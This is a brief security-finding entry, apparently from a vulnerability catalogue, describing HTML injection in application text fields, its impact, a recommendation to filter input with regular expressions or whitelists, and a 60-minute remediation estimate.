Description

The applications fields allow the injection of HTML code. This could enable attackers to modify the applications appearance in order to trick its users into performing undesired actions.

Impact

- Allow an attacker to modify the page. - Craft malicious links, including his injected HTML content, and sends it to a user via email.

Recommendation

Filter the information that comes from text fields with regular expressions or white lists to avoid injections.

Threat

Authenticated attacker from the Internet.

Expected Remediation Time

⏱️ 60 minutes.

Requirements

Fixes